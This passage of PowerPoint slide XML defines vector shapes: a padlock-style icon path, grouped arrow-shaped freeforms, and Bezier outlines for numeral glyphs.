                <a:pos x="35" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="17" y="136"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="8" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="286"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="207" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="150"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="51" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="29"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="20"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="151" y="45"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="187" y="279"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="285"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="24" y="283"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="158"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="183" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="189" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="113" y="190"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="111" y="183"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="179"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="187"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="228"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="214"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="207" h="303">
                <a:moveTo>
                  <a:pt x="180" y="132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="189" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="21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2400"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E4CE7046-64D6-48C1-B7B8-9D5763BA3105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3496641" y="1600201"/>
            <a:ext cx="5198718" cy="4496838"/>
            <a:chOff x="3736336" y="2014895"/>
            <a:chExt cx="4719296" cy="4082143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3736336" y="5001931"/>
              <a:ext cx="1013878" cy="499940"/>
              <a:chOff x="3736336" y="5001931"/>
              <a:chExt cx="1013878" cy="499940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3736336" y="5001931"/>
                <a:ext cx="1013878" cy="499940"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 724"/>
                  <a:gd name="T1" fmla="*/ 357 h 357"/>
                  <a:gd name="T2" fmla="*/ 507 w 724"/>
                  <a:gd name="T3" fmla="*/ 357 h 357"/>
                  <a:gd name="T4" fmla="*/ 724 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 357"/>
                  <a:gd name="T6" fmla="*/ 260 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 357"/>
                  <a:gd name="T8" fmla="*/ 0 w 724"/>
                  <a:gd name="T9" fmla="*/ 176 h 357"/>
                  <a:gd name="T10" fmla="*/ 260 w 724"/>
                  <a:gd name="T11" fmla="*/ 357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4" h="357">
                    <a:moveTo>
                      <a:pt x="260" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="507" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="357"/>
                    </a:ln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14"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3789551" y="5031340"/>
                <a:ext cx="943859" cy="441124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 674 w 674"/>
                  <a:gd name="T1" fmla="*/ 0 h 315"/>
                  <a:gd name="T2" fmla="*/ 230 w 674"/>
                  <a:gd name="T3" fmla="*/ 0 h 315"/>
                  <a:gd name="T4" fmla="*/ 0 w 674"/>
                  <a:gd name="T5" fmla="*/ 155 h 315"/>
                  <a:gd name="T6" fmla="*/ 230 w 674"/>
                  <a:gd name="T7" fmla="*/ 315 h 315"/>
                  <a:gd name="T8" fmla="*/ 481 w 674"/>
                  <a:gd name="T9" fmla="*/ 315 h 315"/>
                  <a:gd name="T10" fmla="*/ 674 w 674"/>
                  <a:gd name="T11" fmla="*/ 0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315">
                    <a:moveTo>
                      <a:pt x="674" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67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4433728" y="3567930"/>
              <a:ext cx="987271" cy="568559"/>
              <a:chOff x="4433728" y="3567930"/>
              <a:chExt cx="987271" cy="568559"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Freeform 11"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433728" y="3567930"/>
                <a:ext cx="987271" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 705"/>
                  <a:gd name="T1" fmla="*/ 406 h 406"/>
                  <a:gd name="T2" fmla="*/ 488 w 705"/>
                  <a:gd name="T3" fmla="*/ 406 h 406"/>
                  <a:gd name="T4" fmla="*/ 705 w 705"/>
                  <a:gd name="T5" fmla="*/ 0 h 406"/>
                  <a:gd name="T6" fmla="*/ 260 w 705"/>
                  <a:gd name="T7" fmla="*/ 0 h 406"/>
                  <a:gd name="T8" fmla="*/ 0 w 705"/>
                  <a:gd name="T9" fmla="*/ 202 h 406"/>
                  <a:gd name="T10" fmla="*/ 260 w 705"/>
                  <a:gd name="T11" fmla="*/ 406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5" h="406">
                    <a:moveTo>
                      <a:pt x="260" y="406"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="406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Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4488343" y="3600139"/>
                <a:ext cx="917252" cy="504141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 655 w 655"/>
                  <a:gd name="T1" fmla="*/ 0 h 360"/>
                  <a:gd name="T2" fmla="*/ 230 w 655"/>
                  <a:gd name="T3" fmla="*/ 0 h 360"/>
                  <a:gd name="T4" fmla="*/ 0 w 655"/>
                  <a:gd name="T5" fmla="*/ 179 h 360"/>
                  <a:gd name="T6" fmla="*/ 230 w 655"/>
                  <a:gd name="T7" fmla="*/ 360 h 360"/>
                  <a:gd name="T8" fmla="*/ 462 w 655"/>
                  <a:gd name="T9" fmla="*/ 360 h 360"/>
                  <a:gd name="T10" fmla="*/ 655 w 655"/>
                  <a:gd name="T11" fmla="*/ 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5" h="360">
                    <a:moveTo>
                      <a:pt x="655" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655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41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4778222" y="3710770"/>
                <a:ext cx="141439" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 111"/>
                  <a:gd name="T1" fmla="*/ 117 h 194"/>
                  <a:gd name="T2" fmla="*/ 96 w 111"/>
                  <a:gd name="T3" fmla="*/ 175 h 194"/>
                  <a:gd name="T4" fmla="*/ 56 w 111"/>
                  <a:gd name="T5" fmla="*/ 194 h 194"/>
                  <a:gd name="T6" fmla="*/ 15 w 111"/>
                  <a:gd name="T7" fmla="*/ 175 h 194"/>
                  <a:gd name="T8" fmla="*/ 0 w 111"/>
                  <a:gd name="T9" fmla="*/ 117 h 194"/>
                  <a:gd name="T10" fmla="*/ 0 w 111"/>
                  <a:gd name="T11" fmla="*/ 77 h 194"/>
                  <a:gd name="T12" fmla="*/ 15 w 111"/>
                  <a:gd name="T13" fmla="*/ 19 h 194"/>
                  <a:gd name="T14" fmla="*/ 55 w 111"/>
                  <a:gd name="T15" fmla="*/ 0 h 194"/>
                  <a:gd name="T16" fmla="*/ 96 w 111"/>
                  <a:gd name="T17" fmla="*/ 19 h 194"/>
                  <a:gd name="T18" fmla="*/ 111 w 111"/>
                  <a:gd name="T19" fmla="*/ 77 h 194"/>
                  <a:gd name="T20" fmla="*/ 111 w 111"/>
                  <a:gd name="T21" fmla="*/ 117 h 194"/>
                  <a:gd name="T22" fmla="*/ 74 w 111"/>
                  <a:gd name="T23" fmla="*/ 73 h 194"/>
                  <a:gd name="T24" fmla="*/ 69 w 111"/>
                  <a:gd name="T25" fmla="*/ 40 h 194"/>
                  <a:gd name="T26" fmla="*/ 56 w 111"/>
                  <a:gd name="T27" fmla="*/ 30 h 194"/>
                  <a:gd name="T28" fmla="*/ 55 w 111"/>
                  <a:gd name="T29" fmla="*/ 30 h 194"/>
                  <a:gd name="T30" fmla="*/ 42 w 111"/>
                  <a:gd name="T31" fmla="*/ 40 h 194"/>
                  <a:gd name="T32" fmla="*/ 37 w 111"/>
                  <a:gd name="T33" fmla="*/ 73 h 194"/>
                  <a:gd name="T34" fmla="*/ 37 w 111"/>
                  <a:gd name="T35" fmla="*/ 120 h 194"/>
                  <a:gd name="T36" fmla="*/ 42 w 111"/>
                  <a:gd name="T37" fmla="*/ 154 h 194"/>
                  <a:gd name="T38" fmla="*/ 55 w 111"/>
                  <a:gd name="T39" fmla="*/ 164 h 194"/>
                  <a:gd name="T40" fmla="*/ 56 w 111"/>
                  <a:gd name="T41" fmla="*/ 164 h 194"/>
                  <a:gd name="T42" fmla="*/ 69 w 111"/>
                  <a:gd name="T43" fmla="*/ 154 h 194"/>
                  <a:gd name="T44" fmla="*/ 74 w 111"/>
                  <a:gd name="T45" fmla="*/ 120 h 194"/>
                  <a:gd name="T46" fmla="*/ 74 w 111"/>
                  <a:gd name="T47" fmla="*/ 73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1" h="194">
                    <a:moveTo>
                      <a:pt x="111" y="117"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="142"/>
                      <a:pt x="106" y="162"/>
                      <a:pt x="96" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="188"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="194"/>
                      <a:pt x="25" y="188"/>
                      <a:pt x="15" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="0" y="142"/>
                      <a:pt x="0" y="11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52"/>
                      <a:pt x="5" y="32"/>
                      <a:pt x="15" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="6"/>
                      <a:pt x="39" y="0"/>
                      <a:pt x="55" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="0"/>
                      <a:pt x="86" y="6"/>
                      <a:pt x="96" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="32"/>
                      <a:pt x="111" y="52"/>
                      <a:pt x="111" y="77"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="58"/>
                      <a:pt x="72" y="47"/>
                      <a:pt x="69" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="61" y="30"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="30"/>
                      <a:pt x="45" y="33"/>
                      <a:pt x="42" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="47"/>
                      <a:pt x="37" y="58"/>
                      <a:pt x="37" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="136"/>
                      <a:pt x="39" y="147"/>
                      <a:pt x="42" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="161"/>
                      <a:pt x="49" y="164"/>
                      <a:pt x="55" y="164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62" y="164"/>
                      <a:pt x="66" y="161"/>
                      <a:pt x="69" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="147"/>
                      <a:pt x="74" y="136"/>
                      <a:pt x="74" y="120"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74" y="7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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940667" y="3710770"/>
                <a:ext cx="145640" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 115"/>
                  <a:gd name="T1" fmla="*/ 81 h 194"/>
                  <a:gd name="T2" fmla="*/ 56 w 115"/>
                  <a:gd name="T3" fmla="*/ 81 h 194"/>
                  <a:gd name="T4" fmla="*/ 71 w 115"/>
                  <a:gd name="T5" fmla="*/ 74 h 194"/>
                  <a:gd name="T6" fmla="*/ 75 w 115"/>
                  <a:gd name="T7" fmla="*/ 54 h 194"/>
                  <a:gd name="T8" fmla="*/ 71 w 115"/>
                  <a:gd name="T9" fmla="*/ 36 h 194"/>
                  <a:gd name="T10" fmla="*/ 57 w 115"/>
                  <a:gd name="T11" fmla="*/ 29 h 194"/>
                  <a:gd name="T12" fmla="*/ 44 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 194"/>
                  <a:gd name="T14" fmla="*/ 39 w 115"/>
                  <a:gd name="T15" fmla="*/ 51 h 194"/>
                  <a:gd name="T16" fmla="*/ 3 w 115"/>
                  <a:gd name="T17" fmla="*/ 51 h 194"/>
                  <a:gd name="T18" fmla="*/ 3 w 115"/>
                  <a:gd name="T19" fmla="*/ 50 h 194"/>
                  <a:gd name="T20" fmla="*/ 18 w 115"/>
                  <a:gd name="T21" fmla="*/ 14 h 194"/>
                  <a:gd name="T22" fmla="*/ 56 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 97 w 115"/>
                  <a:gd name="T25" fmla="*/ 14 h 194"/>
                  <a:gd name="T26" fmla="*/ 112 w 115"/>
                  <a:gd name="T27" fmla="*/ 54 h 194"/>
                  <a:gd name="T28" fmla="*/ 106 w 115"/>
                  <a:gd name="T29" fmla="*/ 77 h 194"/>
                  <a:gd name="T30" fmla="*/ 87 w 115"/>
                  <a:gd name="T31" fmla="*/ 94 h 194"/>
                  <a:gd name="T32" fmla="*/ 108 w 115"/>
                  <a:gd name="T33" fmla="*/ 111 h 194"/>
                  <a:gd name="T34" fmla="*/ 115 w 115"/>
                  <a:gd name="T35" fmla="*/ 139 h 194"/>
                  <a:gd name="T36" fmla="*/ 98 w 115"/>
                  <a:gd name="T37" fmla="*/ 179 h 194"/>
                  <a:gd name="T38" fmla="*/ 56 w 115"/>
                  <a:gd name="T39" fmla="*/ 194 h 194"/>
                  <a:gd name="T40" fmla="*/ 17 w 115"/>
                  <a:gd name="T41" fmla="*/ 180 h 194"/>
                  <a:gd name="T42" fmla="*/ 1 w 115"/>
                  <a:gd name="T43" fmla="*/ 140 h 194"/>
